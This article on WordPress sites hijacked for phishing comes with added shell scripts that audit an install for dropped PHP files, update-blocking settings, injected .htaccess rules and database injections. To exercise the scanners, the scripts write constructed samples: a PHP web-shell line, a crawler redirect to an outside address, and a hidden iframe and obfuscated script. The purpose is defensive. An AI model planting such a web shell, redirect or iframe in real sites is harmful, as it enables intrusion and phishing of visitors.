Chances are, your WordPress site has been compromised and you have not noticed it yet.
Security research firm Netcraft found that almost 12,000 sites running WordPress were used to spread phishing pages and malware in February alone. The report is not surprising. Among the approximately 30 million domains running WordPress, a great many are easy targets: the well-known default administrator username “admin” means an attacker already knows half of the credentials, the standard login path /wp-admin tells them exactly where to try the other half, and the standard directory layout (wp-content, wp-includes) tells them where a dropped file will be served from. Forcing a unique administrator username and a randomly generated password at installation time would remove the easiest guess.
Site owners share the responsibility. Once WordPress is downloaded and installed, the cardinal rule is to keep it patched and up to date, but that is not always done: many owners find the manual upgrade process a chore and put it off.
Only with version 3.7 did WordPress gain the ability to update itself automatically, under certain conditions and settings. Automatic updates still do not protect against zero-day attacks: an attacker who gets in through an unreported vulnerability can plant a backdoor that survives the update, or change the site's settings so that future security updates are silently blocked, all without the owner knowing that anything has happened.
Netcraft’s statistics show that phishing content is most commonly placed in the wp-content directory, which holds user-uploaded files and is therefore normally writable by the web server process; any attacker who gains code execution through the web server can drop malicious files there. Phishing content was also found in the wp-includes and wp-admin directories, which can happen when an installation is not hardened and its permissions are too loose, or when outdated plugins give the attacker a foothold.
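The two conditions just described, files dropped into the writable wp-content tree and settings that quietly disable automatic updates, can be checked with a small read-only audit. The script below is an added example, not code from the article, from Netcraft or from WordPress; it builds a constructed sample install in a scratch directory (every file in it is invented) so it runs offline, and the functions take an install path so they can be pointed at a real site.

```shell
#!/bin/sh
# Added example (not from the article, Netcraft or WordPress): a read-only audit
# for dropped PHP files and for settings that block automatic updates.
# All paths and files below are constructed so the script runs offline.

# Constructed sample install. The layout matches a stock WordPress tree, but
# every file in it is invented for this example.
make_sample_install() {
    root="$1"
    mkdir -p "$root/wp-content/uploads/sample" "$root/wp-content/mu-plugins" "$root/wp-admin"
    printf '%s\n' '<?php' \
        "define('DB_PASSWORD', 'changeme');" \
        "define('AUTOMATIC_UPDATER_DISABLED', true);" > "$root/wp-config.php"
    printf '%s\n' '<?php' \
        "add_filter('auto_update_core', '__return_false');" > "$root/wp-content/mu-plugins/noupdate.php"
    printf 'GIF89a' > "$root/wp-content/uploads/sample/logo.gif"
    printf '%s\n' '<?php eval(base64_decode($_POST["x"]));' > "$root/wp-content/uploads/sample/appleid-login.php"
}

# 1. uploads must be writable by the web server, so it is where dropped files land.
#    Legitimate uploads are media, never PHP, so any PHP here deserves a look.
php_in_uploads() {
    find "$1/wp-content/uploads" -type f \
        \( -iname '*.php' -o -iname '*.php[0-9]' -o -iname '*.phtml' -o -iname '*.phar' \) 2>/dev/null | sort
}

# 2. Files changed within the last N days (default 7) under wp-content, ignoring
#    ordinary image uploads. After an incident this narrows review to what was touched.
recently_changed() {
    find "$1/wp-content" -type f -mtime "-${2:-7}" \
        ! -iname '*.jpg' ! -iname '*.png' ! -iname '*.gif' 2>/dev/null | sort
}

# 3. Ways of pinning the site to a vulnerable version: constants in wp-config.php
#    and update filters in (mu-)plugins. Every hit is a candidate for human review,
#    not proof of compromise; some hosts set these deliberately.
update_blockers() {
    grep -rnE 'AUTOMATIC_UPDATER_DISABLED|WP_AUTO_UPDATE_CORE|auto_update_core|automatic_updater_disabled' \
        "$1/wp-config.php" "$1/wp-content/mu-plugins" "$1/wp-content/plugins" 2>/dev/null || true
}

# Number of lines in a string (0 for the empty string); used for reporting.
count_lines() { if [ -n "$1" ]; then printf '%s\n' "$1" | wc -l | tr -d ' '; else echo 0; fi; }

SAMPLE_ROOT=$(mktemp -d)
make_sample_install "$SAMPLE_ROOT"
echo "== PHP under wp-content/uploads =="; php_in_uploads "$SAMPLE_ROOT"
echo "== Changed in the last 7 days =="; recently_changed "$SAMPLE_ROOT" 7
echo "== Settings that can block automatic updates =="; update_blockers "$SAMPLE_ROOT"
```

On a real install, call `php_in_uploads /path/to/wordpress` and the other two functions against the same path; the sample tree is only there so the script has something to find. A sensible follow-up once uploads are clean is a web-server rule that refuses to execute PHP under wp-content/uploads at all, so a dropped file cannot run even if the directory stays writable.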
Sixty percent of the phishing sites found in wp-admin directories targeted Apple customers, and 25 percent of phishing sites targeted PayPal users.
How to remove WordPress malware
As with any other malware, there is no one-size-fits-all way to clean an infected WordPress site, but the following steps help during and after an attack.
- Change the FTP, cPanel and Plesk passwords, and replace the secrets stored in wp-config.php: the database password (in MySQL as well as in the file) and the authentication keys and salts.
- Keep a current backup of the whole site, files and database; some hosting companies do this for you, but confirm that a backup predates the compromise before restoring from it.
- Check regularly for signs of compromise: the .htaccess file for injected redirects, the database for injected scripts and iframes, and the WordPress directories for files that do not belong there.
- Use the Safe Browsing warnings shown in Google Chrome and the malware reports in Google Webmaster Tools to detect problems that visitors are already being warned about.
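The "rotate the secrets" and "check for compromise" steps above, carried out against constructed sample files, as an added example that is not part of the original article. It assumes the stock wp-config.php layout (one `define('AUTH_KEY', ...)` line per key and salt) and a mysqldump-style text dump of the database; the .htaccess rules, SQL rows and the address 203.0.113.7 are invented for the demonstration.

```shell
#!/bin/sh
# Added example (not from the article): rotate the wp-config.php keys and salts,
# then scan .htaccess and a database dump for the usual injected content.
# Assumptions: stock define('AUTH_KEY', ...) lines; database available as a
# mysqldump-style text file. Everything under $WORK is constructed sample data.

WORK=$(mktemp -d)

# --- constructed samples; nothing below comes from a real site ---
cat > "$WORK/wp-config.php" <<'EOF'
<?php
define('DB_PASSWORD', 'oldpassword');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
EOF

cat > "$WORK/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://203.0.113.7/land.php [R=302,L]
php_value auto_prepend_file /tmp/.x/inc.php
EOF

cat > "$WORK/dump.sql" <<'EOF'
INSERT INTO wp_posts VALUES (1,'Hello world','<p>Welcome to the site.</p>');
INSERT INTO wp_posts VALUES (2,'Offer','<p>Buy now</p><iframe src="http://203.0.113.7/p.html" width="1" height="1"></iframe>');
INSERT INTO wp_options VALUES (99,'widget_text','<script>eval(base64_decode("aGVsbG8="));</script>');
EOF

# 1. Rotate every key and salt. A fresh 64-character random value per line
#    invalidates stolen login cookies and nonces; the file is rewritten in place.
rotate_salts() {
    cfg="$1"; tmp="$cfg.new"
    while IFS= read -r line; do
        case "$line" in
            define*_KEY*|define*_SALT*)
                name=$(printf '%s' "$line" | sed "s/^define('\([A-Z_]*\)'.*/\1/")
                secret=$(LC_ALL=C tr -dc 'A-Za-z0-9' < /dev/urandom | head -c 64)
                printf "define('%s', '%s');\n" "$name" "$secret" ;;
            *) printf '%s\n' "$line" ;;
        esac
    done < "$cfg" > "$tmp"
    mv "$tmp" "$cfg"
}

# Lines still carrying the stock placeholder text (0 after a successful rotation).
stale_placeholders() { grep -c 'put your unique phrase here' "$1" || true; }

# Distinct lengths of the key/salt values (a single "64" after rotation).
secret_lengths() {
    grep -E "^define\('[A-Z_]+_(KEY|SALT)'" "$1" | sed "s/.*', *'\(.*\)');/\1/" \
        | awk '{ print length($0) }' | sort -u
}

# 2. .htaccess: redirects to other hosts (often only for search-engine crawlers or
#    mobile visitors) and injected PHP directives are the usual signs of tampering.
suspicious_htaccess() {
    grep -nE 'RewriteRule.*https?://|auto_prepend_file|auto_append_file|AddHandler|AddType.*php' "$1" || true
}

# 3. Database dump: 1x1 iframes and obfuscated script blocks in post and option content.
suspicious_sql() {
    grep -nE '<iframe[^>]*(width|height)="?[01]"?|eval\(base64_decode|String\.fromCharCode|document\.write\(unescape' "$1" || true
}

rotate_salts "$WORK/wp-config.php"
echo "placeholders left in wp-config.php: $(stale_placeholders "$WORK/wp-config.php")"
echo "== .htaccess =="; suspicious_htaccess "$WORK/.htaccess"
echo "== database dump =="; suspicious_sql "$WORK/dump.sql"
```

Back up the real wp-config.php before pointing `rotate_salts` at it, and remember that rotating the keys does not change the database password: that has to be changed in MySQL and then in the `DB_PASSWORD` line by hand. The grep patterns are a starting point for a manual review, not a complete signature set; every line they flag should be read in context before anything is deleted.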